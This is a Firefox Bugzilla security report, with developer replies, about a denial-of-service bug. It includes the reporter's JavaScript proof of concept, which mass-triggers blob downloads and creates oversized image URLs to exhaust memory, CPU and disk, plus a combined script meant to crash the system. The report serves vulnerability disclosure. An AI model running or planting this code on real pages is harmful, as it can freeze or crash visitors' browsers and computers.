Open Bug 1826471 Opened 1 year ago Updated 1 year ago

DoS and hard disk space exhaustion caused by multiple defects

Categories

(Firefox :: Security, defect)

defect

Tracking

()

People

(Reporter: faarari100, Unassigned)

References

(Blocks 1 open bug)

Details

(Keywords: csectype-dos, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(13 files)

Attached file image.rar

Summary

The browser does not confirm whether the user agrees to download multiple files when downloading multiple files.
Attackers can design malicious code, use blobs to make files, and at the same time use loop functions to create many very long URLs to embed in web pages.
This can cause memory to run out and downloaded files to take up hard drive space. When memory and hard disk space are exhausted, the user's browser and computer will crash.

Firefox version

111.0.1 (64-bit)

Operating system version

Windows 11 22H2

Steps to reproduce

  1. The following code will download a file with the file name PoC
var text = 'PoC'
var link = document.createElement("a");
var file = new Blob([text], { type: 'text/plain' });
link.href = URL.createObjectURL(file);
link.download = "PoC";
  2. This will download 100000 files without confirmation.
for (i = 0; i < 100000; i++) {
   var text = 'PoC'
   var link = document.createElement("a");
   var file = new Blob([text], { type: 'text/plain' });
   link.href = URL.createObjectURL(file);
   link.download = "PoC";
}
  3. The following code will generate a very long set of strings.
var text = ''
for (i = 0; i < 0xfffff; i++) {
   text += 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
}
  4. This will generate 100000 image tags, and the URL format uses the IP address in DWORD format.
for (i = 0; i < 100000; i++) {
   var img = document.createElement("img");
   img.src = 'http://0x' + text
}
  5. At this time, I checked the Process Manager of the browser and the Task Manager of Windows, and found that the memory was exhausted.

  6. If the above code is integrated and then rewritten, the CPU, memory, and hard disk space will be exhausted at the same time. This causes a system crash, and because there is no hard disk space available, the system's event log will be incomplete.

var text = ''
for (i = 0; i < 0xfffff; i++) {
   text += 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
}

var link = document.createElement("a");
var file = new Blob([text], { type: 'text/plain' });
link.href = URL.createObjectURL(file);
link.download = "PoC";

var a = [];
for (i = 0; i < 100000; i++) {
   a.push('');
}
a.forEach(() => {
   var img = document.createElement("img");
   img.src = 'http://0x' + text
   link.click();
})
  7. The computer will become slower and slower, and the user will not be able to interrupt this malicious activity.

  8. Tested with other browsers and could not reproduce this issue.

Flags: sec-bounty?

Please don't attach rar files. Can you just attach files directly to the report?

The download part of this is bug 1711049.

I would expect closing the tab to end all of this activity. Is this not the case?

Flags: needinfo?(faarari100)
Keywords: csectype-dos

Sorry, I will re-upload the attachment.

This report differs from bug 1711049 in that downloading a file is only one of the exploits. The main problem is that hard drive space and memory are exhausted.

Executing the code in steps 3 and 4 can cause the browser and the user's system to crash.

Flags: needinfo?(faarari100)

(In reply to faarari100 from comment #2)
> Executing the code in steps 3 and 4 can cause the browser and the user's system to crash.

We don't consider test cases like this that create a bunch of junk in the web page to really be DoS issues. It should just cause the content process for the web page to use a lot of memory and CPU. Eventually that process will crash, but that shouldn't take down the entire browser. The browser UI should also remain fairly responsive the entire time. With process separation by origin, which we have on desktop, you can't even really interfere with web pages on origins.

Regarding the problem of causing the entire browser to close, it did occur when I was testing. This isn't just a single page crash, it slows down your entire browser and computer while loading a page containing the above code and eventually shuts down your entire browser.

I recorded a video during the test, but because the video file is too large, I had to extract a few pictures from the video. I don't know how to show the complete problem since the picture doesn't highlight the moment the browser closes and the computer slows down.
(Because the computer is getting too slow, I use the camera to record instead of screen recording.)

Of course, the code described above is just a concept. In fact, other writing methods can be used to let the garbage content occupy CPU, memory and hard disk space.

An attacker can use XSS to hide code in a web page, or distribute links to web pages containing the code for users to visit. Regardless of the method used, whenever a user visits such a web page, a large number of files are downloaded, causing the entire web page to be corrupted and the browser and computer to crash.

The severity field is not set for this bug.
:serg, could you have a look please?

For more information, please visit auto_nag documentation.

Flags: needinfo?(sgalich)
Severity: -- → S3
Flags: needinfo?(sgalich)

Unfortunately, DoS bugs are outside the scope of our bug bounty program.

Blocks: eviltraps
Group: firefox-core-security
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: sec-bounty? → sec-bounty-
